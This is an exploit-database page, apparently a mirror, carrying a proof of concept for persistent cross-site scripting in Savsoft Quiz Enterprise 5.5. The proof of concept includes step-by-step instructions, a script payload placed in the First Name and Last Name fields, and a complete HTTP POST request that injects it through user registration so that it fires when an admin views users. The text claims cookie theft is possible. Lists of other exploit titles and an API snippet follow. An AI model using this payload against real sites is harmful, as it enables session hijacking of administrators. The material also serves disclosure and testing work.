To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting"

Author

Exploit author

"Hemant Patidar"

Platform

Exploit platform

php

Release date

Exploit published date

2020-09-03

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting
# Date: 2020-09-01
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://savsoftquiz.com/web/demo.php
# Version: 5.0
# Tested on: Windows 10/Kali Linux
# Contact: https://www.linkedin.com/in/hemantsolo/

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Attack vector:
This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel,
the XSS triggers and attacker can able to steal the cookie according to the crafted payload.

Vulnerable Parameters: First Name, Last Name
1. Go to the registration page.
2. Fill all the details  and put this payload in First and Last Name "<script>alert("OPPS")</script>"
3. Now go to the admin panel and the XSS will be triggered.

POST /savsoftquiz_v5_enterprise/index.php/login/insert_user/ HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 187
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://savsoftquiz.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://TARGET/savsoftquiz_v5_enterprise/index.php/login/registration/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _ga=GA1.2.757300437.1598544895; _gid=GA1.2.1240991040.1598544895; ci_session=mm5q58p28e620n9im0imeildnvabkoeg

email=hemantpatidar1337%40gmail.com&password=test&first_name=<script>alert("OPPS")</script>&last_name=<script>alert("OPPS")</script>&contact_no=0000000000&gid%5B%5D=1
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-09-03 "Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48785/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.